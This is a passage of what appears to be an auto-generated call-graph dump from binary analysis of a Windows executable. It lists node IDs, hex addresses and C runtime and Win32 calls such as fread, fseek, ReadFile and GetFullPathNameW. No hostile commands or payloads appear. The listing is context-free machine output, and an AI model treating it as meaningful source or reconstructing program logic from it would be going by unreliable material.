86973->87064 86975 40f7fc 86975->86973 86976 40f804 86975->86976 87051 414a46 86976->87051 86980 40f80e 86980->86904 86985 4528bd 86980->86985 86982 427c59 87070 414fe2 86982->87070 86984 427c79 86986 4150d1 _fseek 81 API calls 86985->86986 86987 452930 86986->86987 87570 452719 86987->87570 86990 452948 86990->86906 86991 414d04 __fread_nolock 61 API calls 86992 452966 86991->86992 86993 414d04 __fread_nolock 61 API calls 86992->86993 86994 452976 86993->86994 86995 414d04 __fread_nolock 61 API calls 86994->86995 86996 45298f 86995->86996 86997 414d04 __fread_nolock 61 API calls 86996->86997 86998 4529aa 86997->86998 86999 4150d1 _fseek 81 API calls 86998->86999 87000 4529c4 86999->87000 87001 4135bb _malloc 46 API calls 87000->87001 87002 4529cf 87001->87002 87003 4135bb _malloc 46 API calls 87002->87003 87004 4529db 87003->87004 87005 414d04 __fread_nolock 61 API calls 87004->87005 87006 4529ec 87005->87006 87007 44afef GetSystemTimeAsFileTime 87006->87007 87008 452a00 87007->87008 87009 452a36 87008->87009 87010 452a13 87008->87010 87012 452aa5 87009->87012 87013 452a3c 87009->87013 87011 413748 _free 46 API calls 87010->87011 87014 452a1c 87011->87014 87016 413748 _free 46 API calls 87012->87016 87576 44b1a9 87013->87576 87017 413748 _free 46 API calls 87014->87017 87019 452aa3 87016->87019 87020 452a25 87017->87020 87018 452a9d 87021 413748 _free 46 API calls 87018->87021 87019->86906 87020->86906 87021->87019 87023 431e64 87022->87023 87024 431e6a 87022->87024 87025 414a46 __fcloseall 82 API calls 87023->87025 87024->86907 87025->87024 87027 425de2 87026->87027 87031 40f6fc _wcslen 87026->87031 87027->86968 87028 40f710 WideCharToMultiByte 87029 40f756 87028->87029 87030 40f728 87028->87030 87029->86968 87032 4115d7 52 API calls 87030->87032 87031->87028 87033 40f735 WideCharToMultiByte 87032->87033 87033->86968 87036 40f85d __recalloc _strlen 87034->87036 87035 426b3b 87036->87035 87038 40f7ab 87036->87038 87083 414db8 87036->87083 87039 4149c2 87038->87039 87098 414904 87039->87098 87041 40f7e9 87041->86973 87042 40f5c0 87041->87042 87047 40f5cd _strcat __write_nolock _memmove 87042->87047 87043 414d04 __fread_nolock 61 API calls 87043->87047 87045 425d11 87046 4150d1 _fseek 81 API calls 87045->87046 87048 425d33 87046->87048 87047->87043 87047->87045 87050 40f691 __tzset_nolock 87047->87050 87186 4150d1 87047->87186 87049 414d04 __fread_nolock 61 API calls 87048->87049 87049->87050 87050->86975 87052 414a52 __wsopen_helper 87051->87052 87053 414a64 87052->87053 87054 414a79 87052->87054 87326 417f77 46 API calls __getptd_noexit 87053->87326 87056 415471 __lock_file 47 API calls 87054->87056 87061 414a74 __wsopen_helper 87054->87061 87059 414a92 87056->87059 87057 414a69 87327 417f25 10 API calls __wsopen_helper 87057->87327 87310 4149d9 87059->87310 87061->86980 87395 414c76 87064->87395 87066 414d1c 87067 44afef 87066->87067 87563 442c5a 87067->87563 87069 44b00d 87069->86982 87071 414fee __wsopen_helper 87070->87071 87072 414ffa 87071->87072 87073 41500f 87071->87073 87567 417f77 46 API calls __getptd_noexit 87072->87567 87075 415471 __lock_file 47 API calls 87073->87075 87077 415017 87075->87077 87076 414fff 87568 417f25 10 API calls __wsopen_helper 87076->87568 87078 414e4e __ftell_nolock 51 API calls 87077->87078 87080 415024 87078->87080 87569 41503d LeaveCriticalSection LeaveCriticalSection _fprintf 87080->87569 87082 41500a __wsopen_helper 87082->86984 87084 414dd6 87083->87084 87085 414deb 87083->87085 87094 417f77 46 API calls __getptd_noexit 87084->87094 87085->87084 87086 414df2 87085->87086 87096 41b91b 79 API calls 11 library calls 87086->87096 87089 414ddb 87095 417f25 10 API calls __wsopen_helper 87089->87095 87090 414e18 87092 414de6 87090->87092 87097 418f98 77 API calls 6 library calls 87090->87097 87092->87036 87094->87089 87095->87092 87096->87090 87097->87092 87101 414910 __wsopen_helper 87098->87101 87099 414923 87154 417f77 46 API calls __getptd_noexit 87099->87154 87101->87099 87103 414951 87101->87103 87102 414928 87155 417f25 10 API calls __wsopen_helper 87102->87155 87117 41d4d1 87103->87117 87106 414956 87107 41496a 87106->87107 87108 41495d 87106->87108 87110 414992 87107->87110 87111 414972 87107->87111 87156 417f77 46 API calls __getptd_noexit 87108->87156 87134 41d218 87110->87134 87157 417f77 46 API calls __getptd_noexit 87111->87157 87113 414933 __wsopen_helper @_EH4_CallFilterFunc@8 87113->87041 87118 41d4dd __wsopen_helper 87117->87118 87119 4182cb __lock 46 API calls 87118->87119 87132 41d4eb 87119->87132 87120 41d560 87159 41d5fb 87120->87159 87121 41d567 87122 416b04 __malloc_crt 46 API calls 87121->87122 87125 41d56e 87122->87125 87124 41d5f0 __wsopen_helper 87124->87106 87125->87120 87126 41d57c InitializeCriticalSectionAndSpinCount 87125->87126 87127 41d59c 87126->87127 87128 41d5af EnterCriticalSection 87126->87128 87131 413748 _free 46 API calls 87127->87131 87128->87120 87129 418209 __mtinitlocknum 46 API calls 87129->87132 87131->87120 87132->87120 87132->87121 87132->87129 87162 4154b2 47 API calls __lock 87132->87162 87163 415520 LeaveCriticalSection LeaveCriticalSection _doexit 87132->87163 87135 41d23a 87134->87135 87136 41d255 87135->87136 87146 41d26c __wopenfile 87135->87146 87168 417f77 46 API calls __getptd_noexit 87136->87168 87138 41d25a 87169 417f25 10 API calls __wsopen_helper 87138->87169 87140 41d47a 87173 417f77 46 API calls __getptd_noexit 87140->87173 87141 41d48c 87165 422bf9 87141->87165 87144 41499d 87158 4149b8 LeaveCriticalSection LeaveCriticalSection _fprintf 87144->87158 87145 41d47f 87174 417f25 10 API calls __wsopen_helper 87145->87174 87146->87140 87153 41d421 87146->87153 87170 41341f 58 API calls 3 library calls 87146->87170 87149 41d41a 87149->87153 87171 41341f 58 API calls 3 library calls 87149->87171 87151 41d439 87151->87153 87172 41341f 58 API calls 3 library calls 87151->87172 87153->87140 87153->87141 87154->87102 87155->87113 87156->87113 87157->87113 87158->87113 87164 4181f2 LeaveCriticalSection 87159->87164 87161 41d602 87161->87124 87162->87132 87163->87132 87164->87161 87175 422b35 87165->87175 87167 422c14 87167->87144 87168->87138 87169->87144 87170->87149 87171->87151 87172->87153 87173->87145 87174->87144 87178 422b41 __wsopen_helper 87175->87178 87176 422b54 87177 417f77 __recalloc 46 API calls 87176->87177 87179 422b59 87177->87179 87178->87176 87180 422b8a 87178->87180 87181 417f25 __wsopen_helper 10 API calls 87179->87181 87182 422400 __tsopen_nolock 109 API calls 87180->87182 87185 422b63 __wsopen_helper 87181->87185 87183 422ba4 87182->87183 87184 422bcb __wsopen_helper LeaveCriticalSection 87183->87184 87184->87185 87185->87167 87188 4150dd __wsopen_helper 87186->87188 87187 4150e9 87217 417f77 46 API calls __getptd_noexit 87187->87217 87188->87187 87189 41510f 87188->87189 87199 415471 87189->87199 87191 4150ee 87218 417f25 10 API calls __wsopen_helper 87191->87218 87198 4150f9 __wsopen_helper 87198->87047 87200 415483 87199->87200 87201 4154a5 EnterCriticalSection 87199->87201 87200->87201 87202 41548b 87200->87202 87203 415117 87201->87203 87204 4182cb __lock 46 API calls 87202->87204 87205 415047 87203->87205 87204->87203 87206 415067 87205->87206 87207 415057 87205->87207 87212 415079 87206->87212 87220 414e4e 87206->87220 87275 417f77 46 API calls __getptd_noexit 87207->87275 87211 41505c 87219 415143 LeaveCriticalSection LeaveCriticalSection _fprintf 87211->87219 87237 41443c 87212->87237 87215 4150b9 87250 41e1f4 87215->87250 87217->87191 87218->87198 87219->87198 87221 414e61 87220->87221 87222 414e79 87220->87222 87276 417f77 46 API calls __getptd_noexit 87221->87276 87224 414139 __fputwc_nolock 46 API calls 87222->87224 87226 414e80 87224->87226 87225 414e66 87277 417f25 10 API calls __wsopen_helper 87225->87277 87228 41e1f4 __write 51 API calls 87226->87228 87229 414e97 87228->87229 87230 414f09 87229->87230 87232 414ec9 87229->87232 87236 414e71 87229->87236 87278 417f77 46 API calls __getptd_noexit 87230->87278 87233 41e1f4 __write 51 API calls 87232->87233 87232->87236 87234 414f64 87233->87234 87235 41e1f4 __write 51 API calls 87234->87235 87234->87236 87235->87236 87236->87212 87238 414477 87237->87238 87239 414455 87237->87239 87243 414139 87238->87243 87239->87238 87240 414139 __fputwc_nolock 46 API calls 87239->87240 87241 414470 87240->87241 87279 41b7b2 77 API calls 6 library calls 87241->87279 87244 414145 87243->87244 87245 41415a 87243->87245 87280 417f77 46 API calls __getptd_noexit 87244->87280 87245->87215 87247 41414a 87281 417f25 10 API calls __wsopen_helper 87247->87281 87249 414155 87249->87215 87251 41e200 __wsopen_helper 87250->87251 87252 41e223 87251->87252 87253 41e208 87251->87253 87255 41e22f 87252->87255 87258 41e269 87252->87258 87302 417f8a 46 API calls __getptd_noexit 87253->87302 87304 417f8a 46 API calls __getptd_noexit 87255->87304 87256 41e20d 87303 417f77 46 API calls __getptd_noexit 87256->87303 87282 41ae56 87258->87282 87260 41e234 87305 417f77 46 API calls __getptd_noexit 87260->87305 87263 41e23c 87306 417f25 10 API calls __wsopen_helper 87263->87306 87264 41e26f 87266 41e291 87264->87266 87267 41e27d 87264->87267 87307 417f77 46 API calls __getptd_noexit 87266->87307 87292 41e17f 87267->87292 87268 41e215 __wsopen_helper 87268->87211 87271 41e289 87309 41e2c0 LeaveCriticalSection __unlock_fhandle 87271->87309 87272 41e296 87308 417f8a 46 API calls __getptd_noexit 87272->87308 87275->87211 87276->87225 87277->87236 87278->87236 87279->87238 87280->87247 87281->87249 87283 41ae62 __wsopen_helper 87282->87283 87284 41aebc 87283->87284 87287 4182cb __lock 46 API calls 87283->87287 87285 41aec1 EnterCriticalSection 87284->87285 87286 41aede __wsopen_helper 87284->87286 87285->87286 87286->87264 87288 41ae8e 87287->87288 87289 41aeaa 87288->87289 87290 41ae97 InitializeCriticalSectionAndSpinCount 87288->87290 87291 41aeec ___lock_fhandle LeaveCriticalSection 87289->87291 87290->87289 87291->87284 87293 41aded __chsize_nolock 46 API calls 87292->87293 87294 41e18e 87293->87294 87295 41e1a4 SetFilePointer 87294->87295 87296 41e194 87294->87296 87298 41e1c3 87295->87298 87299 41e1bb GetLastError 87295->87299 87297 417f77 __recalloc 46 API calls 87296->87297 87300 41e199 87297->87300 87298->87300 87301 417f9d __dosmaperr 46 API calls 87298->87301 87299->87298 87300->87271 87301->87300 87302->87256 87303->87268 87304->87260 87305->87263 87306->87268 87307->87272 87308->87271 87309->87268 87311 4149ea 87310->87311 87312 4149fe 87310->87312 87356 417f77 46 API calls __getptd_noexit 87311->87356 87313 4149fa 87312->87313 87315 41443c __flush 77 API calls 87312->87315 87328 414ab2 LeaveCriticalSection LeaveCriticalSection _fprintf 87313->87328 87317 414a0a 87315->87317 87316 4149ef 87357 417f25 10 API calls __wsopen_helper 87316->87357 87329 41d8c2 87317->87329 87321 414139 __fputwc_nolock 46 API calls 87322 414a18 87321->87322 87333 41d7fe 87322->87333 87324 414a1e 87324->87313 87325 413748 _free 46 API calls 87324->87325 87325->87313 87326->87057 87327->87061 87328->87061 87330 414a12 87329->87330 87331 41d8d2 87329->87331 87330->87321 87331->87330 87332 413748 _free 46 API calls 87331->87332 87332->87330 87334 41d80a __wsopen_helper 87333->87334 87335 41d812 87334->87335 87336 41d82d 87334->87336 87373 417f8a 46 API calls __getptd_noexit 87335->87373 87337 41d839 87336->87337 87343 41d873 87336->87343 87375 417f8a 46 API calls __getptd_noexit 87337->87375 87340 41d817 87374 417f77 46 API calls __getptd_noexit 87340->87374 87342 41d83e 87376 417f77 46 API calls __getptd_noexit 87342->87376 87345 41ae56 ___lock_fhandle 48 API calls 87343->87345 87347 41d879 87345->87347 87346 41d846 87377 417f25 10 API calls __wsopen_helper 87346->87377 87348 41d893 87347->87348 87349 41d887 87347->87349 87378 417f77 46 API calls __getptd_noexit 87348->87378 87358 41d762 87349->87358 87353 41d81f __wsopen_helper 87353->87324 87354 41d88d 87379 41d8ba LeaveCriticalSection __unlock_fhandle 87354->87379 87356->87316 87357->87313 87380 41aded 87358->87380 87360 41d7c8 87393 41ad67 47 API calls 2 library calls 87360->87393 87362 41d772 87362->87360 87365 41aded __chsize_nolock 46 API calls 87362->87365 87372 41d7a6 87362->87372 87363 41aded __chsize_nolock 46 API calls 87366 41d7b2 CloseHandle 87363->87366 87364 41d7d0 87370 41d7f2 87364->87370 87394 417f9d 46 API calls 3 library calls 87364->87394 87367 41d79d 87365->87367 87366->87360 87368 41d7be GetLastError 87366->87368 87371 41aded __chsize_nolock 46 API calls 87367->87371 87368->87360 87370->87354 87371->87372 87372->87360 87372->87363 87373->87340 87374->87353 87375->87342 87376->87346 87377->87353 87378->87354 87379->87353 87381 41ae12 87380->87381 87382 41adfa 87380->87382 87385 417f8a __chsize_nolock 46 API calls 87381->87385 87386 41ae51 87381->87386 87383 417f8a __chsize_nolock 46 API calls 87382->87383 87384 41adff 87383->87384 87387 417f77 __recalloc 46 API calls 87384->87387 87388 41ae23 87385->87388 87386->87362 87389 41ae07 87387->87389 87390 417f77 __recalloc 46 API calls 87388->87390 87389->87362 87391 41ae2b 87390->87391 87392 417f25 __wsopen_helper 10 API calls 87391->87392 87392->87389 87393->87364 87394->87370 87396 414c82 __wsopen_helper 87395->87396 87397 414cc3 87396->87397 87398 414cbb __wsopen_helper 87396->87398 87402 414c96 __recalloc 87396->87402 87399 415471 __lock_file 47 API calls 87397->87399 87398->87066 87401 414ccb 87399->87401 87408 414aba 87401->87408 87422 417f77 46 API calls __getptd_noexit 87402->87422 87403 414cb0 87423 417f25 10 API calls __wsopen_helper 87403->87423 87412 414ad8 __recalloc 87408->87412 87414 414af2 87408->87414 87409 414ae2 87475 417f77 46 API calls __getptd_noexit 87409->87475 87411 414ae7 87476 417f25 10 API calls __wsopen_helper 87411->87476 87412->87409 87412->87414 87419 414b2d 87412->87419 87424 414cfa LeaveCriticalSection LeaveCriticalSection _fprintf 87414->87424 87416 414c38 __recalloc 87478 417f77 46 API calls __getptd_noexit 87416->87478 87417 414139 __fputwc_nolock 46 API calls 87417->87419 87419->87414 87419->87416 87419->87417 87425 41dfcc 87419->87425 87455 41d8f3 87419->87455 87477 41e0c2 46 API calls 3 library calls 87419->87477 87422->87403 87423->87398 87424->87398 87426 41dfd8 __wsopen_helper 87425->87426 87427 41dfe0 87426->87427 87428 41dffb 87426->87428 87548 417f8a 46 API calls __getptd_noexit 87427->87548 87429 41e007 87428->87429 87434 41e041 87428->87434 87550 417f8a 46 API calls __getptd_noexit 87429->87550 87432 41dfe5 87549 417f77 46 API calls __getptd_noexit 87432->87549 87433 41e00c 87551 417f77 46 API calls __getptd_noexit 87433->87551 87437 41e063 87434->87437 87438 41e04e 87434->87438 87439 41ae56 ___lock_fhandle 48 API calls 87437->87439 87553 417f8a 46 API calls __getptd_noexit 87438->87553 87442 41e069 87439->87442 87440 41e014 87552 417f25 10 API calls __wsopen_helper 87440->87552 87445 41e077 87442->87445 87446 41e08b 87442->87446 87443 41e053 87554 417f77 46 API calls __getptd_noexit 87443->87554 87444 41dfed __wsopen_helper 87444->87419 87479 41da15 87445->87479 87555 417f77 46 API calls __getptd_noexit 87446->87555 87451 41e083 87557 41e0ba LeaveCriticalSection __unlock_fhandle 87451->87557 87452 41e090 87556 417f8a 46 API calls __getptd_noexit 87452->87556 87456 41d900 87455->87456 87461 41d915 87455->87461 87561 417f77 46 API calls __getptd_noexit 87456->87561 87458 41d910 87458->87419 87459 41d905 87562 417f25 10 API calls __wsopen_helper 87459->87562 87461->87458 87462 41d94a 87461->87462 87558 420603 87461->87558 87464 414139 __fputwc_nolock 46 API calls 87462->87464 87465 41d95e 87464->87465 87466 41dfcc __read 59 API calls 87465->87466 87467 41d965 87466->87467 87467->87458 87468 414139 __fputwc_nolock 46 API calls 87467->87468 87469 41d988 87468->87469 87469->87458 87470 414139 __fputwc_nolock 46 API calls 87469->87470 87471 41d994 87470->87471 87471->87458 87472 414139 __fputwc_nolock 46 API calls 87471->87472 87473 41d9a1 87472->87473 87474 414139 __fputwc_nolock 46 API calls 87473->87474 87474->87458 87475->87411 87476->87414 87477->87419 87478->87411 87480 41da31 87479->87480 87481 41da4c 87479->87481 87483 417f8a __chsize_nolock 46 API calls 87480->87483 87482 41da5b 87481->87482 87484 41da7a 87481->87484 87485 417f8a __chsize_nolock 46 API calls 87482->87485 87486 41da36 87483->87486 87488 41da98 87484->87488 87499 41daac 87484->87499 87487 41da60 87485->87487 87489 417f77 __recalloc 46 API calls 87486->87489 87491 417f77 __recalloc 46 API calls 87487->87491 87492 417f8a __chsize_nolock 46 API calls 87488->87492 87500 41da3e 87489->87500 87490 41db02 87494 417f8a __chsize_nolock 46 API calls 87490->87494 87493 41da67 87491->87493 87495 41da9d 87492->87495 87496 417f25 __wsopen_helper 10 API calls 87493->87496 87497 41db07 87494->87497 87498 417f77 __recalloc 46 API calls 87495->87498 87496->87500 87501 417f77 __recalloc 46 API calls 87497->87501 87502 41daa4 87498->87502 87499->87490 87499->87500 87503 41dae1 87499->87503 87505 41db1b 87499->87505 87500->87451 87501->87502 87504 417f25 __wsopen_helper 10 API calls 87502->87504 87503->87490 87508 41daec ReadFile 87503->87508 87504->87500 87507 416b04 __malloc_crt 46 API calls 87505->87507 87509 41db31 87507->87509 87510 41dc17 87508->87510 87511 41df8f GetLastError 87508->87511 87514 41db59 87509->87514 87515 41db3b 87509->87515 87510->87511 87518 41dc2b 87510->87518 87512 41de16 87511->87512 87513 41df9c 87511->87513 87522 417f9d __dosmaperr 46 API calls 87512->87522 87527 41dd9b 87512->87527 87516 417f77 __recalloc 46 API calls 87513->87516 87519 420494 __lseeki64_nolock 48 API calls 87514->87519 87517 417f77 __recalloc 46 API calls 87515->87517 87520 41dfa1 87516->87520 87521 41db40 87517->87521 87518->87527 87528 41dc47 87518->87528 87531 41de5b 87518->87531 87523 41db67 87519->87523 87524 417f8a __chsize_nolock 46 API calls 87520->87524 87525 417f8a __chsize_nolock 46 API calls 87521->87525 87522->87527 87523->87508 87524->87527 87525->87500 87526 413748 _free 46 API calls 87526->87500 87527->87500 87527->87526 87529 41dcab ReadFile 87528->87529 87536 41dd28 87528->87536 87534 41dcc9 GetLastError 87529->87534 87539 41dcd3 87529->87539 87530 41ded0 ReadFile 87532 41deef GetLastError 87530->87532 87540 41def9 87530->87540 87531->87527 87531->87530 87532->87531 87532->87540 87533 41ddec MultiByteToWideChar 87533->87527 87535 41de10 GetLastError 87533->87535 87534->87528 87534->87539 87535->87512 87536->87527 87537 41dda3 87536->87537 87538 41dd96 87536->87538 87544 41dd60 87536->87544 87537->87544 87545 41ddda 87537->87545 87541 417f77 __recalloc 46 API calls 87538->87541 87539->87528 87542 420494 __lseeki64_nolock 48 API calls 87539->87542 87540->87531 87543 420494 __lseeki64_nolock 48 API calls 87540->87543 87541->87527 87542->87539 87543->87540 87544->87533 87546 420494 __lseeki64_nolock 48 API calls 87545->87546 87547 41dde9 87546->87547 87547->87533 87548->87432 87549->87444 87550->87433 87551->87440 87552->87444 87553->87443 87554->87440 87555->87452 87556->87451 87557->87444 87559 416b04 __malloc_crt 46 API calls 87558->87559 87560 420618 87559->87560 87560->87462 87561->87459 87562->87458 87566 4148b3 GetSystemTimeAsFileTime __aulldiv 87563->87566 87565 442c6b 87565->87069 87566->87565 87567->87076 87568->87082 87569->87082 87574 45272f __tzset_nolock _wcscpy 87570->87574 87571 414d04 61 API calls __fread_nolock 87571->87574 87572 4528a4 87572->86990 87572->86991 87573 44afef GetSystemTimeAsFileTime 87573->87574 87574->87571 87574->87572 87574->87573 87575 4150d1 81 API calls _fseek 87574->87575 87575->87574 87577 44b1bc 87576->87577 87578 44b1ca 87576->87578 87579 4149c2 116 API calls 87577->87579 87580 44b1e1 87578->87580 87581 4149c2 116 API calls 87578->87581 87582 44b1d8 87578->87582 87579->87578 87611 4321a4 87580->87611 87583 44b2db 87581->87583 87582->87018 87583->87580 87585 44b2e9 87583->87585 87587 44b2f6 87585->87587 87590 414a46 __fcloseall 82 API calls 87585->87590 87586 44b224 87588 44b253 87586->87588 87589 44b228 87586->87589 87587->87018 87615 43213d 87588->87615 87592 414a46 __fcloseall 82 API calls 87589->87592 87594 44b235 87589->87594 87590->87587 87592->87594 87593 44b25a 87596 44b260 87593->87596 87597 44b289 87593->87597 87595 414a46 __fcloseall 82 API calls 87594->87595 87599 44b245 87594->87599 87595->87599 87600 44b26d 87596->87600 87602 414a46 __fcloseall 82 API calls 87596->87602 87625 44b0bf 87 API calls 87597->87625 87599->87018 87603 44b27d 87600->87603 87604 414a46 __fcloseall 82 API calls 87600->87604 87601 44b28f 87626 4320f8 46 API calls _free 87601->87626 87602->87600 87603->87018 87604->87603 87606 44b295 87607 44b2a2 87606->87607 87608 414a46 __fcloseall 82 API calls 87606->87608 87609 44b2b2 87607->87609 87610 414a46 __fcloseall 82 API calls 87607->87610 87608->87607 87609->87018 87610->87609 87612 4321b4 __tzset_nolock _memmove 87611->87612 87613 4321cb 87611->87613 87612->87586 87614 414d04 __fread_nolock 61 API calls 87613->87614 87614->87612 87616 4135bb _malloc 46 API calls 87615->87616 87617 432150 87616->87617 87618 4135bb _malloc 46 API calls 87617->87618 87619 432162 87618->87619 87620 4135bb _malloc 46 API calls 87619->87620 87621 432174 87620->87621 87624 432189 87621->87624 87627 4320f8 46 API calls _free 87621->87627 87623 432198 87623->87593 87624->87593 87625->87601 87626->87606 87627->87623 87628->86920 87629->86923 87630->86940 87631->86940 87632->86940 87633->86933 87634->86940 87635->86940 87636->86946 87637->86954 87638->86956 87639->86956 87689 410160 87640->87689 87642 41012f GetFullPathNameW 87643 410147 moneypunct 87642->87643 87643->86776 87645 4102cb SHGetDesktopFolder 87644->87645 87648 410333 _wcsncpy 87644->87648 87646 4102e0 _wcsncpy 87645->87646 87645->87648 87647 41031c SHGetPathFromIDListW 87646->87647 87646->87648 87647->87648 87648->86779 87650 4101bb 87649->87650 87655 425f4a 87649->87655 87651 410160 52 API calls 87650->87651 87652 4101c7 87651->87652 87693 410200 52 API calls 2 library calls 87652->87693 87653 4114ab __wcsicoll 58 API calls 87653->87655 87655->87653 87657 425f6e 87655->87657 87656 4101d6 87694 410200 52 API calls 2 library calls 87656->87694 87657->86781 87659 4101e9 87659->86781 87661 40f760 128 API calls 87660->87661 87662 40f584 87661->87662 87663 429335 87662->87663 87664 40f58c 87662->87664 87665 4528bd 118 API calls 87663->87665 87666 40f598 87664->87666 87667 429358 87664->87667 87668 42934b 87665->87668 87719 4033c0 113 API calls 7 library calls 87666->87719 87720 434034 86 API calls _wprintf 87667->87720 87671 429373 87668->87671 87672 42934f 87668->87672 87676 4115d7 52 API calls 87671->87676 87675 431e58 82 API calls 87672->87675 87673 429369 87673->87671 87674 40f5b4 87674->86778 87675->87667 87688 4293c5 moneypunct 87676->87688 87677 42959c 87678 413748 _free 46 API calls 87677->87678 87679 4295a5 87678->87679 87680 431e58 82 API calls 87679->87680 87681 4295b1 87680->87681 87685 401b10 52 API calls 87685->87688 87688->87677 87688->87685 87695 444af8 87688->87695 87698 44b41c 87688->87698 87705 402780 87688->87705 87713 4022d0 87688->87713 87721 44c7dd 64 API calls 3 library calls 87688->87721 87690 410167 _wcslen 87689->87690 87691 4115d7 52 API calls 87690->87691 87692 41017e _wcscpy 87691->87692 87692->87642 87693->87656 87694->87659 87696 4115d7 52 API calls 87695->87696 87697 444b27 _memmove 87696->87697 87697->87688 87699 44b429 87698->87699 87700 4115d7 52 API calls 87699->87700 87701 44b440 87700->87701 87702 44b45e 87701->87702 87703 401b10 52 API calls 87701->87703 87702->87688 87704 44b453 87703->87704 87704->87688 87706 402827 87705->87706 87711 402790 moneypunct _memmove 87705->87711 87709 4115d7 52 API calls 87706->87709 87707 4115d7 52 API calls 87708 402797 87707->87708 87710 4115d7 52 API calls 87708->87710 87712 4027bd 87708->87712 87709->87711 87710->87712 87711->87707 87712->87688 87714 40239d 87713->87714 87715 4022e0 87713->87715 87714->87688 87715->87714 87716 4115d7 52 API calls 87715->87716 87717 402320 moneypunct 87715->87717 87716->87717 87717->87714 87718 4115d7 52 API calls 87717->87718 87718->87717 87719->87674 87720->87673 87721->87688 87723 402417 87722->87723 87727 402539 moneypunct 87722->87727 87724 4115d7 52 API calls 87723->87724 87723->87727 87725 402443 87724->87725 87726 4115d7 52 API calls 87725->87726 87728 4024b4 87726->87728 87727->86785 87728->87727 87730 4022d0 52 API calls 87728->87730 87751 402880 95 API calls 2 library calls 87728->87751 87730->87728 87735 401566 87731->87735 87732 401794 87752 40e9a0 90 API calls 87732->87752 87735->87732 87736 4010a0 52 API calls 87735->87736 87737 40167a 87735->87737 87736->87735 87738 4017c0 87737->87738 87753 45e737 90 API calls 3 library calls 87737->87753 87738->86787 87740 40bc70 52 API calls 87739->87740 87749 40d451 87740->87749 87741 40d50f 87756 410600 52 API calls 87741->87756 87743 427c01 87757 45e737 90 API calls 3 library calls 87743->87757 87744 40e0a0 52 API calls 87744->87749 87746 401b10 52 API calls 87746->87749 87747 40d519 87747->86790 87749->87741 87749->87743 87749->87744 87749->87746 87749->87747 87754 40f310 53 API calls 87749->87754 87755 40d860 91 API calls 87749->87755 87751->87728 87752->87737 87753->87738 87754->87749 87755->87749 87756->87747 87757->87747 87758->86803 87759->86804 87761 42c5fe 87760->87761 87776 4091c6 87760->87776 87762 40bc70 52 API calls 87761->87762 87761->87776 87763 42c64e InterlockedIncrement 87762->87763 87764 42c665 87763->87764 87769 42c697 87763->87769 87766 42c672 InterlockedDecrement Sleep InterlockedIncrement 87764->87766 87764->87769 87765 42c737 InterlockedDecrement 87767 42c74a 87765->87767 87766->87764 87766->87769 87770 408f40 VariantClear 87767->87770 87768 42c731 87768->87765 87769->87765 87769->87768 88053 408e80 87769->88053 87772 42c752 87770->87772 88062 410c60 VariantClear moneypunct 87772->88062 87776->86865 87777 42c6db 87778 402160 52 API calls 87777->87778 87779 42c6e5 87778->87779 88058 45340c 85 API calls 87779->88058 87781 42c6f1 88059 40d200 52 API calls 2 library calls 87781->88059 87783 42c6fb 88060 465124 53 API calls 87783->88060 87785 42c715 87786 42c76a 87785->87786 87787 42c719 87785->87787 87788 401b10 52 API calls 87786->87788 88061 46fe32 VariantClear 87787->88061 87790 42c77e 87788->87790 87791 401980 53 API calls 87790->87791 87792 42c796 87791->87792 87793 42c812 87792->87793 87797 42c864 87792->87797 88063 40ba10 52 API calls 2 library calls 87792->88063 88064 46fe32 VariantClear 87793->88064 87795 42c82a InterlockedDecrement 88065 46ff07 54 API calls 87795->88065 88066 45e737 90 API calls 3 library calls 87797->88066 87799 42c9ec 88109 47d33e 331 API calls 87799->88109 87802 42c9fe 88110 46feb1 VariantClear VariantClear 87802->88110 87804 408f40 VariantClear 87814 42c849 87804->87814 87805 42ca08 87806 401b10 52 API calls 87805->87806 87809 42ca15 87806->87809 87807 408f40 VariantClear 87810 42c891 87807->87810 87808 402780 52 API calls 87808->87814 87811 40c2c0 52 API calls 87809->87811 88067 410c60 VariantClear moneypunct 87810->88067 87815 42c874 87811->87815 87813 401980 53 API calls 87813->87814 87814->87799 87814->87804 87814->87808 87814->87813 88068 40a780 87814->88068 87815->87807 87817 42ca59 87815->87817 87817->87817 87819 40afc4 87818->87819 87820 40b156 87818->87820 87821 40afd5 87819->87821 87822 42d1e3 87819->87822 88120 45e737 90 API calls 3 library calls 87820->88120 87825 40a780 194 API calls 87821->87825 87841 40b11a moneypunct 87821->87841 88121 45e737 90 API calls 3 library calls 87822->88121 87828 40b00a 87825->87828 87826 42d1f8 87831 408f40 VariantClear 87826->87831 87827 40b143 87827->86865 87828->87826 87832 40b012 87828->87832 87830 42d4db 87830->87830 87831->87827 87833 40b04a 87832->87833 87834 42d231 VariantClear 87832->87834 87842 40b094 moneypunct 87832->87842 87837 40b05c moneypunct 87833->87837 88122 40e270 VariantClear moneypunct 87833->88122 87834->87837 87835 42d45a VariantClear 87835->87841 87836 40b108 87836->87841 88123 40e270 VariantClear moneypunct 87836->88123 87840 4115d7 52 API calls 87837->87840 87837->87842 87840->87842 87841->87827 88124 45e737 90 API calls 3 library calls 87841->88124 87842->87836 87843 42d425 moneypunct 87842->87843 87843->87835 87843->87841 87845 408fff 87844->87845 87849 40900d 87844->87849 88125 403ea0 52 API calls __cinit 87845->88125 87848 42c3f6 88128 45e737 90 API calls 3 library calls 87848->88128 87849->87848 87851 40a780 194 API calls 87849->87851 87852 42c44a 87849->87852 87854 42c47b 87849->87854 87856 42c4cb 87849->87856 87857 42c564 87849->87857 87860 42c548 87849->87860 87864 409112 87849->87864 87866 4090df 87849->87866 87868 42c528 87849->87868 87871 4090ea 87849->87871 87878 4090f2 moneypunct 87849->87878 88127 4534e3 52 API calls 87849->88127 88129 40c4e0 194 API calls 87849->88129 87851->87849 88130 45e737 90 API calls 3 library calls 87852->88130 88131 451b42 61 API calls 87854->88131 88133 47faae 233 API calls 87856->88133 87861 408f40 VariantClear 87857->87861 88136 45e737 90 API calls 3 library calls 87860->88136 87861->87878 87862 42c491 87862->87878 88132 45e737 90 API calls 3 library calls 87862->88132 87863 42c4da 87863->87878 88134 45e737 90 API calls 3 library calls 87863->88134 87864->87860 87869 40912b 87864->87869 87866->87871 87872 408e80 VariantClear 87866->87872 88135 45e737 90 API calls 3 library calls 87868->88135 87869->87878 88126 403e10 53 API calls 87869->88126 87874 408f40 VariantClear 87871->87874 87872->87871 87874->87878 87876 40914b 87877 408f40 VariantClear 87876->87877 87877->87878 87878->86865 88137 408d90 87879->88137 87881 429778 88165 410c60 VariantClear moneypunct 87881->88165 87883 429780 87884 408cf9 87884->87881 87885 42976c 87884->87885 87887 408d2d 87884->87887 88164 45e737 90 API calls 3 library calls 87885->88164 88153 403d10 87887->88153 87890 408d71 moneypunct 